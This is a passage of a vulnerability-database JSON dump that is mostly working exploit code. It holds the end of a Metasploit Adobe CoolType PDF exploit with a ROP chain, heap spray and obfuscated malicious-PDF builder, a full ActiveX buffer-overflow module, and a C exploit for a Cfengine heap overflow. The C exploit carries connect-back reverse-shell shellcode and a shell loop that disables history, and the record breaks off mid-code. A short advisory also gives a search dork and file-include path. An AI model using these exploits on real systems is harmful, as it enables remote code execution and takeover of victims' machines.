execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a8a0004, # becomes eax - saved file mapping ptr\n\n 0x4a80a7d8, # mov 
eax,[eax] / ret - load saved mapping ptr\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000020, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a80aedc, # lea edx,[esp+0xc] / push edx / push eax / push [esp+0xc] / push [0x4a8a093c] / call ecx / add esp, 0x10 / ret\n\n 0x4a801f90, # pop eax / ret\n 0x00000034, # becomes eax\n\n 0x4a80d585, # add eax,edx / ret\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x0000000a, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849170, # becomes eax (import for memcpy)\n\n # -- call memcpy\n 0x4a80b692, # jmp [eax]\n\n 0xffffffff, # this stuff gets overwritten by the block at 0x4a80aedc, becomes ret from memcpy\n 0xffffffff, # becomes first arg to memcpy (dst)\n 0xffffffff, # becomes second arg to memcpy (src)\n 0x00001000, # becomes third arg to memcpy (length)\n #0x0000258b, # ??\n #0x4d4d4a8a, # ??\n ].pack('V*')\n\n var_unescape = rand_text_alpha(rand(100) + 1)\n var_shellcode = rand_text_alpha(rand(100) + 1)\n\n var_start = rand_text_alpha(rand(100) + 1)\n\n var_s = 0x10000\n var_c = rand_text_alpha(rand(100) + 1)\n var_b = rand_text_alpha(rand(100) + 1)\n var_d = rand_text_alpha(rand(100) + 1)\n var_3 = rand_text_alpha(rand(100) + 1)\n var_i = rand_text_alpha(rand(100) + 1)\n var_4 = rand_text_alpha(rand(100) + 1)\n\n payload_buf = ''\n payload_buf << stack_data\n payload_buf << encoded_payload\n\n escaped_payload = Rex::Text.to_unescape(payload_buf)\n\n js = %Q|\nvar #{var_unescape} = unescape;\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + 
\"c\" );\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\n#{var_b} += #{var_shellcode};\n#{var_b} += #{var_c};\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\nvar #{var_4} = new Array();\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\n|\n\n js\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj \\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n #return str\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n\n def make_pdf(ttf, js)\n\n #swf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\n\n xref = []\n eol = \"\\n\"\n endobj = \"endobj\" << eol\n\n # Randomize PDF version?\n pdf = \"%PDF-1.5\" << eol\n pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # catalog\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Pages \") << io_ref(2) << eol\n pdf << n_obfu(\"/Type /Catalog\") << eol\n pdf << n_obfu(\"/OpenAction \") << io_ref(11) << eol\n # The AcroForm is required to get icucnv36.dll to load\n pdf << n_obfu(\"/AcroForm \") << io_ref(13) << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # pages array\n xref << pdf.length\n pdf << io_def(2) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/MediaBox \") << io_ref(3) << eol\n pdf << n_obfu(\"/Resources \") << 
io_ref(4) << eol\n pdf << n_obfu(\"/Kids [\") << io_ref(5) << \"]\" << eol\n pdf << n_obfu(\"/Count 1\") << eol\n pdf << n_obfu(\"/Type /Pages\") << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # media box\n xref << pdf.length\n pdf << io_def(3)\n pdf << \"[0 0 595 842]\" << eol\n pdf << endobj\n\n # resources\n xref << pdf.length\n pdf << io_def(4)\n pdf << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Font \") << io_ref(6) << eol\n pdf << \">>\" << eol\n pdf << endobj\n\n # page 1\n xref << pdf.length\n pdf << io_def(5) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Parent \") << io_ref(2) << eol\n pdf << n_obfu(\"/MediaBox \") << io_ref(3) << eol\n pdf << n_obfu(\"/Resources \") << io_ref(4) << eol\n pdf << n_obfu(\"/Contents [\") << io_ref(8) << n_obfu(\"]\") << eol\n pdf << n_obfu(\"/Type /Page\") << eol\n pdf << n_obfu(\">>\") << eol # end obj dict\n pdf << endobj\n\n # font\n xref << pdf.length\n pdf << io_def(6) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/F1 \") << io_ref(7) << eol\n pdf << \">>\" << eol\n pdf << endobj\n\n # ttf object\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Type /Font\") << eol\n pdf << n_obfu(\"/Subtype /TrueType\") << eol\n pdf << n_obfu(\"/Name /F1\") << eol\n pdf << n_obfu(\"/BaseFont /Cinema\") << eol\n pdf << n_obfu(\"/Widths []\") << eol\n pdf << n_obfu(\"/FontDescriptor \") << io_ref(9)\n pdf << n_obfu(\"/Encoding /MacRomanEncoding\")\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # page content\n content = \"Hello World!\"\n content = \"\" +\n \"0 g\" + eol +\n \"BT\" + eol +\n \"/F1 32 Tf\" + eol +\n \"32 Tc\" + eol +\n \"1 0 0 1 32 773.872 Tm\" + eol +\n \"(\" + content + \") Tj\" + eol +\n \"ET\"\n\n xref << pdf.length\n pdf << io_def(8) << \"<<\" << eol\n pdf << n_obfu(\"/Length %s\" % content.length) << eol\n pdf << \">>\" << eol\n pdf << \"stream\" << eol\n pdf << content << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # font descriptor\n xref << pdf.length\n pdf << 
io_def(9) << n_obfu(\"<<\")\n pdf << n_obfu(\"/Type/FontDescriptor/FontName/Cinema\")\n pdf << n_obfu(\"/Flags %d\" % (2**2 + 2**6 + 2**17))\n pdf << n_obfu(\"/FontBBox [-177 -269 1123 866]\")\n pdf << n_obfu(\"/FontFile2 \") << io_ref(10)\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # ttf stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ttf)\n pdf << io_def(10) << n_obfu(\"<</Length %s/Filter/FlateDecode/Length1 %s>>\" % [compressed.length, ttf.length]) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # js action\n xref << pdf.length\n pdf << io_def(11) << n_obfu(\"<<\")\n pdf << n_obfu(\"/Type/Action/S/JavaScript/JS \") + io_ref(12)\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # js stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(12) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # The following form related data is required to get icucnv36.dll to load\n ###\n\n # form object\n xref << pdf.length\n pdf << io_def(13)\n pdf << n_obfu(\"<</XFA \") << io_ref(14) << n_obfu(\">>\") << eol\n pdf << endobj\n\n # form stream\n xfa = <<-EOF\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\">\n<present><pdf><interactive>1</interactive></pdf></present>\n</config>\n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\">\n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\">\n<pageSet></pageSet>\n</subform></template></xdp:xdp>\nEOF\n\n xref << pdf.length\n pdf << io_def(14) << n_obfu(\"<</Length %s>>\" % xfa.length) << eol\n pdf << \"stream\" << eol\n pdf << xfa << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # end form stuff for icucnv36.dll\n 
###\n\n\n # trailing stuff\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n\n pdf << \"%%EOF\" << eol\n pdf\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_cooltype_sing.rb"}, {"lastseen": "2019-12-02T07:59:58", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in Microsoft Whale Intelligent Application Gateway Whale Client. When sending an overly long string to CheckForUpdates() method of WhlMgr.dll (3.1.502.64) an attacker may be able to execute arbitrary code.\n", "modified": "2017-10-05T21:44:36", "published": "2009-04-15T21:38:50", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MSWHALE_CHECKFORUPDATES", "href": "", "type": "metasploit", "title": "Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Microsoft Whale Intelligent Application\n Gateway Whale Client. 
When sending an overly long string to CheckForUpdates()\n method of WhlMgr.dll (3.1.502.64) an attacker may be able to execute\n arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-2238' ],\n [ 'OSVDB', '53933'],\n [ 'URL', 'http://technet.microsoft.com/en-us/library/dd282918.aspx' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]\n ],\n 'DisclosureDate' => 'Apr 15 2009',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload.\n return if ((p = regenerate_payload(cli)) == nil)\n\n # fluff..\n fluff = rand_text_english(rand(20) + 1)\n\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Set the return.\n ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"or cl,[edx]\").encode_string * 2)\n\n js = %Q|\n try {\n var evil_string = \"\";\n var index;\n var vulnerable = new ActiveXObject('ComponentManager.Installer.1');\n var my_unescape = unescape;\n var shellcode = '#{shellcode}';\n #{js_heap_spray}\n sprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);\n for (index = 0; index < 15000; index++) {\n evil_string = evil_string + my_unescape('#{ret}');\n }\n vulnerable.CheckForUpdates(evil_string,'#{fluff}');\n } catch( e ) { window.location = 'about:blank' ; }\n |\n\n opts = {\n 'Strings' => true,\n 'Symbols' => {\n 'Variables' => [\n 'vulnerable',\n 'shellcode',\n 'my_unescape',\n 'index',\n 'evil_string',\n ]\n }\n }\n js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\n js.update_opts(js_heap_spray.opts)\n js.obfuscate(memory_sensitive: true)\n content = 
%Q|<html>\n<body>\n<script><!--\n#{js}\n//</script>\n</body>\n</html>\n|\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/mswhale_checkforupdates.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:21", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2006-11-22T00:00:00", "published": "2006-11-22T00:00:00", "id": "SECURITYVULNS:VULN:6847", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6847", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:20", "bulletinFamily": "software", "description": "\r\n\r\n===============================================================================\r\n=Bug was found in the part of phpBB\r\n=\r\n=Dork : "Powered by Dimension"\r\n=\r\n=Expl : includes/functions.php?phpbb_root_path=\r\n=\r\n=Source Code : http://www.xs4all.nl/~hkicken/plusxl20/phpbb2_plusxl_20_272.zip\r\n=\r\n=Found by : Rendy & BlueSpy\r\n= IRC.ALLINDO.NET\r\n===============================================================================\r\n\r\n\r\n\r\n", "modified": "2006-11-22T00:00:00", "published": "2006-11-22T00:00:00", "id": "SECURITYVULNS:DOC:15167", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15167", "title": "PhpBB Module Dimension Remote File Include", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:12", "bulletinFamily": "software", "description": 
"\r\n----------------------------------------------------------------------\r\n\r\nWant a new IT Security job?\r\n\r\nVacant positions at Secunia:\r\nhttp://secunia.com/secunia_vacancies/\r\n\r\n----------------------------------------------------------------------\r\n\r\nTITLE:\r\nPlans Cross-Site Scripting and Password Disclosure Vulnerabilities\r\n\r\nSECUNIA ADVISORY ID:\r\nSA15167\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/15167/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nCross Site Scripting, Exposure of sensitive information\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nPlans 6.x\r\nhttp://secunia.com/product/5021/\r\n\r\nDESCRIPTION:\r\nSome vulnerabilities have been reported in Plans, which can be\r\nexploited by malicious people to conduct cross-site scripting attacks\r\nor gain knowledge of sensitive information.\r\n\r\n1) Input passed to various unspecified parameters is not properly\r\nsanitised before being returned to users. This can be exploited to\r\nexecute arbitrary HTML and script code in a user's browser session in\r\ncontext of a vulnerable site.\r\n\r\n2) An unspecified error can be exploited to gain knowledge of the\r\nMySQL password.\r\n\r\nSOLUTION:\r\nUpdate to version 6.7.1 or later.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\n1) NoseyNick\r\n2) Gary Lewis\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those 
supplied by the vendor.\r\n", "modified": "2005-05-03T00:00:00", "published": "2005-05-03T00:00:00", "id": "SECURITYVULNS:DOC:8525", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8525", "title": "[SA15167] Plans Cross-Site Scripting and Password Disclosure Vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-10T11:25:16", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2005-02-20T00:00:00", "published": "2005-02-20T00:00:00", "id": "1337DAY-ID-8525", "href": "https://0day.today/exploit/description/8525", "type": "zdt", "title": "GNU Cfengine 2.17p1 RSA Authentication Heap Overflow Exploit", "sourceData": "============================================================\r\nGNU Cfengine 2.17p1 RSA Authentication Heap Overflow Exploit\r\n============================================================\r\n\r\n/* removed line 54 /str0ke */\r\n\r\n/* _ ________ _____ ______\r\n*\r\n* cfengine rsa heap remote exploit part of PTjob project / \\ / \"fuck mm\"\r\n* by jsk:exworm(http://exworm.hostrocket.com) \\/\r\n* bug found by core\r\n* yep ta mei dayong ..hehe..so pub it..\r\n* my home: www.ph4nt0m.org\r\n* GT: emm.oyxin.seal.ava.haggis.b_root.more..\r\n* No girl No money No jop...\r\n* bash-2.05b# ./cf_0day -t 1 -h 192.168.31.23\r\n* cfengine rsa heap remote exploit ....s\r\n* --------------------------------------------------(need money.to..fk..girl..)\r\n* [+] lisntener...\r\n* [+] Connected, sending code...\r\n* [+] Ret: 0x0819f03e\r\n* [+] Got: 0x0811a590\r\n* [+] ownedbyOseen!\r\n* -----------------------------------------------------------\r\n* Linux ns2.autson.com 2.4.18-3 #1 Thu Apr 18 07:37:53 EDT 2002 i686 unknown\r\n* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10\r\n*(wheel)\r\n*\r\n*\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdarg.h>\r\n#include <stdlib.h>\r\n#include 
<netdb.h>\r\n#include <net/if.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/time.h>\r\n#include <netinet/in.h>\r\n#include <getopt.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <arpa/inet.h>\r\n#include <errno.h>\r\n#include <linux/sockios.h>\r\n\r\n#define BUF 1024\r\n\r\nstruct {\r\n char *distro;\r\n char *type;\r\n unsigned long ret;\r\n unsigned long got;\r\n\r\n} targets[] = { /*got is free of rsafree() ,get it by yourself to own more machine ;) */\r\n { \"Redhat 7.3 \", \"cfengine 2.1.7p1 \",0x0819f03e , 0x0811a590 },\r\n { \"Redhat 7.2 \", \"cfengine 2.17p1 \", 0x080d1c78, 0x0806d0e3 },\r\n { \"Redhat 7.1 \", \"cfengine 2.17p1\", 0x080d11e0, 0x082bc090 },\r\n { \"Crash \", \"(All platforms) \", 0x42424242, 0x41414141 },\r\n};\r\nchar linux_connect_back[] = /* connect back 45295 */\r\n\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\"\r\n \"\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\"\r\n \"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\"\r\n \"\\x89\\xc2\\x31\\xc0\\x31\\xc9\\x51\\x51\"\r\n \"\\x68\\x41\\x42\\x43\\x44\\x66\\x68\\xb0\"\r\n \"\\xef\\xb1\\x02\\x66\\x51\\x89\\xe7\\xb3\"\r\n \"\\x10\\x53\\x57\\x52\\x89\\xe1\\xb3\\x03\"\r\n \"\\xb0\\x66\\xcd\\x80\\x31\\xc9\\x39\\xc1\"\r\n \"\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\"\r\n \"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xcd\\x80\"\r\n \"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xb1\\x01\"\r\n \"\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\"\r\n \"\\xb1\\x02\\xcd\\x80\\x31\\xc0\\x31\\xd2\"\r\n \"\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\"\r\n \"\\x2f\\x62\\x69\\x89\\xe3\\x50\\x53\\x89\"\r\n \"\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\xb0\"\r\n \"\\x01\\xcd\\x80\";\r\nint sock;\r\nvoid usage();\r\nvoid shell();\r\n\r\nvoid\r\nusage(char *prog)\r\n{\r\n\r\n fprintf(stderr,\"Usage: %s -t [-pah]\\n\",prog);\r\n fprintf(stderr,\"-t version Linux version.\\n\");\r\n fprintf(stderr,\"-h target The host to attack.\\n\");\r\n fprintf(stderr,\"-a password Default 
password is \\\"sorry no password. \\\".\\n\");\r\n fprintf(stderr,\"-p port Default port is 5803.\\n\\n\");\r\n}\r\n\r\nint\r\nopenhost(char *host,int port)\r\n{\r\n struct sockaddr_in addr;\r\n struct hostent *he;\r\n\r\n he=gethostbyname(host);\r\n\r\n if (he==NULL) return -1;\r\n sock=socket(AF_INET, SOCK_STREAM, getprotobyname(\"tcp\")->p_proto);\r\n if (sock==-1) return -1;\r\n\r\n memcpy(&addr.sin_addr, he->h_addr, he->h_length);\r\n\r\n addr.sin_family=AF_INET;\r\n addr.sin_port=htons(port);\r\n\r\n if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)\r\n sock=-1;\r\n return sock;\r\n}\r\n\r\nvoid\r\nshell(int sock)\r\n{\r\n fd_set fd_read;\r\n char buff[1024], *cmd=\"unset HISTFILE; /bin/uname -a;/usr/bin/id; echo '*** oseen are chinese...'\\n\";\r\n int n;\r\n\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n FD_SET(0, &fd_read);\r\n\r\n send(sock, cmd, strlen(cmd), 0);\r\n\r\n while(1) {\r\n FD_SET(sock, &fd_read);\r\n FD_SET(0, &fd_read);\r\n\r\n if (select(sock+1, &fd_read, NULL, NULL, NULL) < 0) break;\r\n\r\n if (FD_ISSET(sock, &fd_read)) {\r\n if ((n = recv(sock, buff, sizeof(buff), 0)) < 0){\r\n fprintf(stderr, \"[+] EOF\\n\");\r\n exit(2);\r\n }\r\n\r\n if (write(1, buff, n) <0) break;\r\n }\r\n\r\n if (FD_ISSET(0, &fd_read)) {\r\n if ((n = read(0, buff, sizeof(buff))) < 0){\r\n fprintf(stderr,\"[+] EOF\\n\");\r\n exit(2);\r\n }\r\n\r\n if (send(sock, buff, n, 0) < 0) break;\r\n }\r\n }\r\n\r\n fprintf(stderr,\"[+] Connection lost.\\n\\n\");\r\n exit(0);\r\n}\r\n\r\nunsigned char\r\n*get_my_ip_addr(int sockfd, struct ifreq *ifr)\r\n{\r\n struct sockaddr_in sin;\r\n char *b = (char *) malloc(4);\r\n\r\n if (ioctl(sockfd ,SIOCGIFADDR,ifr) < 0) {\r\n fprintf(stderr, \"Unable to get the local IP Address, use -d.\\n\");\r\n exit(1);\r\n }\r\n\r\n memcpy(&sin, &ifr->ifr_addr, sizeof(struct sockaddr_in));\r\n memcpy(b, (char *) &sin.sin_addr.s_addr, 4);\r\n return b;\r\n}\r\n\r\nint\r\nmain (int argc,char *argv[])\r\n{\r\n char 
buf1[512];\r\n char buf2[512];\r\n char host[256];\r\n char pass[256]=\"changeme\";\r\n char data;\r\n\r\n int type= 0;\r\n int c=0;\r\n int port=8001;\r\n char device[256] = \"eth0\";\r\n unsigned char *ptr;\r\n\r\n struct hostent *hp;\r\n struct sockaddr_in sin_listener;\r\n struct ifreq ifr;\r\n struct timeval timeout;\r\n\r\n fd_set fdread;\r\n\r\n int delay = 12;\r\n int i = 0;\r\n int mode = 0;\r\n int local_port = 0;\r\n int opt = 0;\r\n int ret = 0;\r\n int sin_len = sizeof (struct sockaddr_in);\r\n int sock = 0;\r\n int sock2 = 0;\r\n int sockd = 0;\r\n int listener = 0;\r\n int time_out = 4;\r\n int tmp = 0;\r\n\r\n srand(getpid());\r\n\r\n fprintf(stdout,\"cfengine rsa heap remote exploit ....s\\n\");\r\n fprintf(stdout,\"--------------------------------------------------(need money.to..fk..girl..)\\n\");\r\n\r\n while((c=getopt(argc,argv,\"h:p:a:t:\")) !=EOF)\r\n {\r\n switch(c)\r\n {\r\n case 'p':\r\n port=atoi(optarg);\r\n if ((port <= 0) || (port > 65535)) {\r\n fprintf(stderr,\"Invalid port.\\n\\n\");\r\n exit(1);\r\n }\r\n break;\r\n case 'a':\r\n memset(pass,0x0,sizeof(pass));\r\n strncpy(pass,optarg,sizeof(pass) - 1);\r\n break;\r\n case 't':\r\n type = atoi(optarg);\r\n if (type == 0 || type > sizeof(targets) / 28) {\r\n for(i = 0; i < sizeof(targets) / 28; i++)\r\n fprintf(stderr, \"%02d. 
%s - %s [0x%08x - 0x%08x]\\n\",\r\n i + 1, targets[i].distro, targets[i].type, targets[i].ret, targets[i].got);\r\n return -1;\r\n }\r\n break;\r\n case 'h':\r\n memset(host,0x0,sizeof(host));\r\n strncpy(host,optarg,sizeof(host) - 1);\r\n break;\r\n\r\n default:\r\n usage(argv[0]);\r\n exit(1);\r\n break;\r\n }\r\n }\r\n\r\n timeout.tv_sec = time_out;\r\n timeout.tv_usec = 0;\r\n\r\n if (strlen(host) == 0) {\r\n usage(argv[0]);\r\n exit(1);\r\n }\r\n sock=openhost(host, 5308);\r\n\r\n if (sock==-1) {\r\n fprintf(stderr,\"- Unable to connect.\\n\\n\");\r\n exit(1);\r\n }\r\n\r\n strncpy(ifr.ifr_name, device, 15);\r\n\r\n if ((sockd = socket(AF_INET, SOCK_DGRAM, 17)) < 0) {\r\n fprintf(stderr, \"socket() error.\\n\");\r\n return -1;\r\n }\r\n\r\n if ((listener = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {\r\n fprintf(stderr, \"socket() error.\\n\");\r\n return -1;\r\n }\r\n\r\n ptr = get_my_ip_addr(sockd, &ifr);\r\n memcpy(&sin_listener.sin_addr.s_addr, ptr, 4);\r\n\r\n sin_listener.sin_family = AF_INET;\r\n memset(&sin_listener.sin_zero, 0x00, 8);\r\n\r\n while(1) {\r\n local_port = local_port = 45295;\r\n sin_listener.sin_port = htons(local_port);\r\n if (!bind(listener, (struct sockaddr *) &sin_listener, sin_len)) break;\r\n }\r\n\r\n listen(listener, 1);\r\n fprintf(stdout, \"[+] lisntener...\\n\");\r\n linux_connect_back[33] = (unsigned int) *(ptr + 0);\r\n linux_connect_back[34] = (unsigned int) *(ptr + 1);\r\n linux_connect_back[35] = (unsigned int) *(ptr + 2);\r\n linux_connect_back[36] = (unsigned int) *(ptr + 3);\r\n\r\n memset(buf2, 0x0, sizeof(buf2));\r\n memset(buf1, 0x90, sizeof(buf1));\r\n\r\n for(i=0;i < strlen(linux_connect_back); i++) buf1[i+50] = linux_connect_back[i];\r\n\r\n buf1[0] = (0x41414141 & 0x000000ff);\r\n buf1[1] = (0x41414141 & 0x0000ff00) >> 8;\r\n buf1[2] = (0x41414141 & 0x00ff0000) >> 16;\r\n buf1[3] = (0x41414141 & 0xff000000) >> 24;\r\n\r\n buf1[4] = (0x58585858 & 0x000000ff);\r\n buf1[5] = (0x58585858 & 0x0000ff00) >> 
8;\r\n buf1[6] = (0x58585858 & 0x00ff0000) >> 16;\r\n buf1[7] = (0x58585858 & 0xff000000) >> 24;\r\n\r\n buf1[8] = (0xfffffffc & 0x000000ff);\r\n buf1[9] = (0xfffffffc & 0x0000ff00) >> 8;\r\n buf1[10] = (0xfffffffc & 0x00ff0000) >> 16;\r\n buf1[11] = (0xfffffffc & 0xff000000) >> 24;\r\n\r\n buf1[12] = (0xffffffff & 0x000000ff);\r\n buf1[13] = (0xffffffff & 0x0000ff00) >> 8;\r\n buf1[14] = (0xffffffff & 0x00ff0000) >> 16;\r\n buf1[15] = (0xffffffff & 0xff000000) >> 24;\r\n\r\n buf1[16] = (targets[type - 1].got -12 & 0x000000ff);\r\n buf1[17] = (targets[type - 1].got -12 & 0x0000ff00) >> 8;\r\n buf1[18] = (targets[type - 1].got -12 & 0x00ff0000) >> 16;\r\n buf1[19] = (targets[type - 1].got -12 & 0xff000000) >> 24;\r\n\r\n buf1[20] = (targets[type - 1].ret & 0x000000ff);\r\n buf1[21] = (targets[type - 1].ret & 0x0000ff00) >> 8;\r\n buf1[22] = (targets[type - 1].ret & 0x00ff0000) >> 16;\r\n buf1[23] = (targets[type - 1].ret & 0xff000000) >> 24;\r\n\r\n for(i = 0; i < 300 - sizeof(linux_connect_back) -80; i+=2)\r\n {\r\n buf1[i + 24] = 0x7f;\r\n buf1[i + 25] = 0xeb;\r\n 